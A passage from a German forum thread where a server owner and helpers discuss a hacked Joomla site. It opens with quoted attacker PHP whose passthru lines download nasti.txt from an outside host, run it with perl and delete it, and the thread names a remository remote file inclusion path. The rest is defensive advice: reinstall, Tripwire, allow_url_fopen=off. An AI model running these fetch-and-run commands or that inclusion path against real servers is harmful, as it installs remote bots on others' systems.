passthru('cd /tmp;curl -O La página solicitada no se encuentra - miarroba.com nasti.txt;rm -f nasti.txt*');
passthru('cd /tmp;lwp-download La página solicitada no se encuentra - miarroba.com nasti.txt;rm -f nasti.txt*');
passthru('cd /tmp;lynx -source http://source.webcindario.com/nasti.txt >nnasti.txt;perl nasti.txt;rm -f nasti.txt*');
passthru('cd /tmp;fetch La página solicitada no se encuentra - miarroba.com nasti.txt;rm -f txt*');
passthru('cd /tmp;GET http://source.webcindario.com/nasti.txt >nasti.txt;perl nasti.txt;rm -f nasti.txt*');
?>

Grüße

 

[V40]

Hallo,

damit ist es bestätigt.
Joomla heisst deine Lücke

 

[docHouse]

Ja, das sehe ich auch so ....

zumindest was das

/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

angeht !

Das zu patchen, sollte nicht das Problem sein ...

Kannst Du sonst noch was aus dem Script ersehen ?

grüße

 

[V40]

Hallo,

ganz grundelegend solltest du deinen Server komplett neu machen.

Herauszifnden was alles modifiziert wurde und wo überall Dateien abgelegt wurden und so weiter, ist zwar möglich aber sehr Zeitintensiv.

Alleine der Shellbot (der auf deinem System laut deinen Logs vorhanden ist) lädt diverse Dateien nach, was die nun wieder machen ist etwas ganz anderes.

Also wie gesagt, neu machen, bekannt Patche einspielen usw usw.

Auf gar keinen Fall ein paar Lücken stopfen und Ports sperren, denn was noch alles geändert wurde erfährst du im Zweifelsfall erst wenn es zu spät ist.

 

[docHouse]

Hallo,

ich danke Euch beiden jedenfalls - habt mir schon sehr geholfen ... und dann werde ich in den sauren Apfel beissen und alles neu machen

However, was mich allerdings interessieren würde, wie kann man das nachvollziehen was wie und wo geändert wurde ? Also, wie ist der Weg das rauszufinden ?

Grüße

 

[V40]

Hallo,

ich Nachhinein ist sowas nicht ganz so einfach.

Du kannst allerdings, wenn du deinen Server neu gemacht hast, Tripwire installieren.

Tripwire ist ein Dateiprüfer der prüft ob und wenn wann Dateien geändert wurden und benachrichtig dich darüber.

Tripwire findest du hier : SourceForge.net: Open Source Tripwire®

 

[charli]

Hallo,

wenn man das mit angemessenem Aufwand und der erforderlichen Sicherheit könnte, bräuchtest Du nicht neu installieren.

Insbesondere kann Root die Logfiles beliebig manipulieren, ein Hacker der Rootrecht erlangt hat kann die Logs so modifizieren, daß man den Eindruck hat, er hat nur einen IRC-Bot laufen lassen und sonst nix.

Das hat gegenüber einem völligen Verstecken sogar einen Vorteil: der Hacker kann nicht alles fälschen, z.B. nicht die Trafficstatistik im Kundenmenü beim Provider. Der Serverbesitzer (bzw derjenige der sich weiterhin dafür hält ) sieht die Trafficpeaks, forscht nach der Ursache, findet den IRC-Bot, beseitigt ihn inkl. Einstiegsloch und läßt den Server ohne Neuinstallation weiterlaufen.

Der Hacker hat sich zusätzlich ein Hintertürchen installiert, läßt den Server jedoch erstmal in Ruhe und greift irgendwann darauf zurück, wenn er ihn für einen (dann wirklich dicken Angriff) brauchen kann. Er könnte auch alle Passwörter mitloggen und hin und wieder abholen.

War nur eine theroetische Möglichkeit, ist aber mit angemessenem Aufwand und ausreichender Sicherheit nicht von einem Einbruch zu unterscheiden der tatsächlich nur den Bot laufen lies.

Die großen frei verfügbaren PHP-Pakete sind der Hauptangriffsweg, weil diese so verbreitet sind, daß man nur auf Verdacht Domains abklappern muß mit den entsprechenden Aufrufen und oft genug eines findet das nicht schnell genug alle Updates installiert bekommen hat.

Mit allow_url_fopen=off und chmod 700 auf wget wäre der Angriff bei Dir in's Leere gelaufen.